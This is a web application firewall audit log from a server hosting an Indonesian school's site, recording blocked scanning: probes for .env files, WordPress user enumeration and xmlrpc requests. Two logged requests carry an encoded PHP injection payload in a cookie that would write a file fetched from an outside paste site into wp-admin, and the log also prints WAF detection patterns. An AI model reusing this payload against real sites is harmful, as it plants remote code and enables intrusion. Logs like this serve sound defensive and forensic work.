8181 --cfbf867f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 204.48.19.8 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 204.48.19.8 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (OS/2; Warp 4.5; rv:10.0.12) Gecko/20100101 Firefox/10.0.12 Accept-Charset: utf-8 --cfbf867f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cfbf867f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746771468991375 765 (- - -) Stopwatch2: 1746771468991375 765; combined=325, p1=289, p2=0, p3=0, p4=0, p5=36, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cfbf867f-Z-- --92fb6571-A-- [09/May/2025:13:36:37 +0700] aB2idS-fAO47ojYKsMoliAAAAEw 103.236.140.4 39406 103.236.140.4 8181 --92fb6571-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 202.51.216.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.51.216.119 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --92fb6571-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --92fb6571-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746772597148934 825 (- - -) Stopwatch2: 1746772597148934 825; combined=325, p1=284, p2=0, p3=0, p4=0, p5=41, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92fb6571-Z-- --c715247f-A-- [09/May/2025:13:36:37 +0700] aB2idS-fAO47ojYKsMoliQAAAEQ 103.236.140.4 39410 103.236.140.4 8181 --c715247f-B-- GET /sendgrid/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 202.51.216.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.51.216.119 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --c715247f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c715247f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746772597766795 757 (- - -) Stopwatch2: 1746772597766795 757; combined=311, p1=275, p2=0, p3=0, p4=0, p5=35, sr=108, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c715247f-Z-- --a8fec61b-A-- [09/May/2025:13:39:11 +0700] aB2jDx6q_ZMebht3q15eJgAAAI8 103.236.140.4 39434 103.236.140.4 8181 --a8fec61b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.105.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.105.50 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a8fec61b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8fec61b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746772751808383 3279 (- - -) Stopwatch2: 1746772751808383 3279; combined=1364, p1=468, p2=859, p3=0, p4=0, p5=37, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8fec61b-Z-- --15979f3b-A-- [09/May/2025:13:39:16 +0700] aB2jFFoC-7ITMWTA_c-FQQAAAMo 103.236.140.4 39438 103.236.140.4 8181 --15979f3b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.105.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.105.50 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --15979f3b-C-- demo.sayHello --15979f3b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --15979f3b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746772756176889 4837 (- - -) Stopwatch2: 1746772756176889 4837; combined=3731, p1=478, p2=3061, p3=21, p4=23, p5=87, sr=67, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15979f3b-Z-- --fdecb47d-A-- [09/May/2025:13:39:51 +0700] aB2jNy-fAO47ojYKsMoljwAAAE4 103.236.140.4 39442 103.236.140.4 8181 --fdecb47d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.102.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.102.238 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fdecb47d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fdecb47d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746772791894794 3252 (- - -) Stopwatch2: 1746772791894794 3252; combined=1397, p1=497, p2=868, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fdecb47d-Z-- --4deb7430-A-- [09/May/2025:13:39:55 +0700] aB2jOx6q_ZMebht3q15eKAAAAJc 103.236.140.4 39446 103.236.140.4 8181 --4deb7430-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.102.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.102.238 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4deb7430-C-- demo.sayHello --4deb7430-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4deb7430-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746772795707205 4792 (- - -) Stopwatch2: 1746772795707205 4792; combined=3736, p1=463, p2=3124, p3=16, p4=17, p5=67, sr=68, sw=49, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4deb7430-Z-- --2781b82a-A-- [09/May/2025:13:47:28 +0700] aB2lAC-fAO47ojYKsMollgAAAEw 103.236.140.4 39486 103.236.140.4 8181 --2781b82a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 OPR/62.0.3331.99 Accept-Charset: utf-8 --2781b82a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2781b82a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746773248730490 792 (- - -) Stopwatch2: 1746773248730490 792; combined=311, p1=277, p2=0, p3=0, p4=0, p5=34, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2781b82a-Z-- --39ac2116-A-- [09/May/2025:14:09:16 +0700] aB2qHFoC-7ITMWTA_c-K7QAAAMk 103.236.140.4 34086 103.236.140.4 8181 --39ac2116-B-- GET /wp-content/plugins/wp-catcher/index.php HTTP/1.0 Referer: www.google.com Host: www.smkn22-jkt.sch.id Cookie: 14[5]=file_exists;14[7]=a1;14[12]=a123;14[14]=a2;14[19]=a3;14[21]=b123;14[26]=a4;14[28]=a5;14[33]=c123;14[35]=a6;14[40]=file_exists;14[42]=d123;14[47]=fopen;14[49]=a9;14[54]=base64_decode;14[56]=a;14[61]=a10;14[63]=e123;14[68]=abc;14[70]=kk;14[75]=base64_decode;14[77]=ddd;14[82]=a11;14[84]=g123;14[89]=a12;14[91]=a13;14[96]=.php;14[98]=a14;14[103]=a15;14[105]=i123;14[110]=w;14[112]=a17;14[117]=j123;14[119]=a18;14[124]=a;14[126]=k123;14[131]=a19;14[133]=a20;14[138]=l123;14[140]=a21;14[145]=a22;14[147]=m123;14[152]=uniqid;14[154]=a24;14[159]=n123;14[161]=a25;14[166]=a26;14[168]=o123;14[173]=a;14[175]=a27;14[180]=fwrite;14[182]=a28;14[187]=a29;14[189]=r123;14[194]=a30;14[196]=a31;14[201]=s123;14[203]=a32;14[208]=;14[210]=t123;14[215]=a35;14[217]=a;14[222]=q123;14[224]=a35;14[229]=a36;14[231]=u123;14[236]=a37;14[238]=a38;14[243]=w123;14[245]=a39;14[250]=a40;14[252]=x123;14[257]=a41;14[259]=a42;14[264]=123;14[266]=a;14[271]=a43;14[273]=y123;14[278]=a44;14[280]=a44;14[285]=z123;14[287]=a45;14[292]=a46;14[294]=1234;3=UEQ5d2FIQWdaV05vYnlBblVuaFNSWGh3Ykc5cGRDYzdJR1ozY21sMFpTaG1iM0JsYmlna1gxTkZVbFpGVWxzblJFOURWVTFGVGxSZlVrOVBWQ2RkTGljdmQzQXRZV1J0YVc0dmF6Tk9NRWROVmtJdWNHaHdKeXduZHlzbktTeG1hV3hsWDJkbGRGOWpiMjUwWlc1MGN5Z25hSFIwY0hNNkx5OXlaVzUwY25rdVkyOHZZWEYwZG5vdmNtRjNKeWtwT3lBL1BnPT0= X-Real-IP: 45.134.225.130 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 45.134.225.130 X-Forwarded-Proto: http Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 --39ac2116-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --39ac2116-E-- --39ac2116-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\$_(?:(?:pos|ge)t|session))\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "70"] [id "211230"] [rev "1"] [msg "COMODO WAF: PHP Injection Attack||www.smkn22-jkt.sch.id|F|2"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746774556699275 4034 (- - -) Stopwatch2: 1746774556699275 4034; combined=2374, p1=705, p2=1639, p3=0, p4=0, p5=30, sr=71, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39ac2116-Z-- --4158201e-A-- [09/May/2025:14:09:20 +0700] aB2qIB6q_ZMebht3q15ieQAAAJc 103.236.140.4 34164 103.236.140.4 8181 --4158201e-B-- GET /wp-content/plugins/wp-catcher/index.php HTTP/1.0 Referer: www.google.com Host: www.smkn22-jkt.sch.id Cookie: 14[5]=file_exists;14[7]=a1;14[12]=a123;14[14]=a2;14[19]=a3;14[21]=b123;14[26]=a4;14[28]=a5;14[33]=c123;14[35]=a6;14[40]=file_exists;14[42]=d123;14[47]=fopen;14[49]=a9;14[54]=base64_decode;14[56]=a;14[61]=a10;14[63]=e123;14[68]=abc;14[70]=kk;14[75]=base64_decode;14[77]=ddd;14[82]=a11;14[84]=g123;14[89]=a12;14[91]=a13;14[96]=.php;14[98]=a14;14[103]=a15;14[105]=i123;14[110]=w;14[112]=a17;14[117]=j123;14[119]=a18;14[124]=a;14[126]=k123;14[131]=a19;14[133]=a20;14[138]=l123;14[140]=a21;14[145]=a22;14[147]=m123;14[152]=uniqid;14[154]=a24;14[159]=n123;14[161]=a25;14[166]=a26;14[168]=o123;14[173]=a;14[175]=a27;14[180]=fwrite;14[182]=a28;14[187]=a29;14[189]=r123;14[194]=a30;14[196]=a31;14[201]=s123;14[203]=a32;14[208]=;14[210]=t123;14[215]=a35;14[217]=a;14[222]=q123;14[224]=a35;14[229]=a36;14[231]=u123;14[236]=a37;14[238]=a38;14[243]=w123;14[245]=a39;14[250]=a40;14[252]=x123;14[257]=a41;14[259]=a42;14[264]=123;14[266]=a;14[271]=a43;14[273]=y123;14[278]=a44;14[280]=a44;14[285]=z123;14[287]=a45;14[292]=a46;14[294]=1234;3=UEQ5d2FIQWdaV05vYnlBblVuaFNSWGh3Ykc5cGRDYzdJR1ozY21sMFpTaG1iM0JsYmlna1gxTkZVbFpGVWxzblJFOURWVTFGVGxSZlVrOVBWQ2RkTGljdmQzQXRZV1J0YVc0dmF6Tk9NRWROVmtJdWNHaHdKeXduZHlzbktTeG1hV3hsWDJkbGRGOWpiMjUwWlc1MGN5Z25hSFIwY0hNNkx5OXlaVzUwY25rdVkyOHZZWEYwZG5vdmNtRjNKeWtwT3lBL1BnPT0= X-Real-IP: 45.134.225.130 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 45.134.225.130 X-Forwarded-Proto: https Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 --4158201e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4158201e-E-- --4158201e-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\$_(?:(?:pos|ge)t|session))\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "70"] [id "211230"] [rev "1"] [msg "COMODO WAF: PHP Injection Attack||www.smkn22-jkt.sch.id|F|2"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746774560219753 4107 (- - -) Stopwatch2: 1746774560219753 4107; combined=2440, p1=840, p2=1568, p3=0, p4=0, p5=31, sr=75, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4158201e-Z-- --b2072037-A-- [09/May/2025:14:36:38 +0700] aB2whloC-7ITMWTA_c-TKQAAAMw 103.236.140.4 38822 103.236.140.4 8181 --b2072037-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.33.134 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.33.134 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b2072037-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b2072037-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746776198918809 2650 (- - -) Stopwatch2: 1746776198918809 2650; combined=1455, p1=486, p2=939, p3=0, p4=0, p5=30, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b2072037-Z-- --4e028e31-A-- [09/May/2025:14:36:44 +0700] aB2wjC-fAO47ojYKsMoz9gAAAE4 103.236.140.4 38948 103.236.140.4 8181 --4e028e31-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.33.134 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.33.134 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4e028e31-C-- demo.sayHello --4e028e31-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e028e31-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746776204885234 5638 (- - -) Stopwatch2: 1746776204885234 5638; combined=4345, p1=528, p2=3546, p3=62, p4=40, p5=99, sr=71, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e028e31-Z-- --15c99a03-A-- [09/May/2025:14:36:46 +0700] aB2wjloC-7ITMWTA_c-TRgAAAMk 103.236.140.4 38976 103.236.140.4 8181 --15c99a03-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.69 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.69 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --15c99a03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --15c99a03-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746776206382291 3344 (- - -) Stopwatch2: 1746776206382291 3344; combined=1472, p1=476, p2=965, p3=0, p4=0, p5=31, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15c99a03-Z-- --687ec91b-A-- [09/May/2025:14:36:51 +0700] aB2wky-fAO47ojYKsMoz_QAAAEQ 103.236.140.4 39102 103.236.140.4 8181 --687ec91b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.69 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.69 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --687ec91b-C-- demo.sayHello --687ec91b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --687ec91b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746776211510796 6187 (- - -) Stopwatch2: 1746776211510796 6187; combined=4549, p1=633, p2=3685, p3=33, p4=36, p5=95, sr=125, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --687ec91b-Z-- --8f1c7276-A-- [09/May/2025:15:07:58 +0700] aB233loC-7ITMWTA_c-dEQAAAMg 103.236.140.4 51784 103.236.140.4 8181 --8f1c7276-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.17 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8f1c7276-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f1c7276-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file 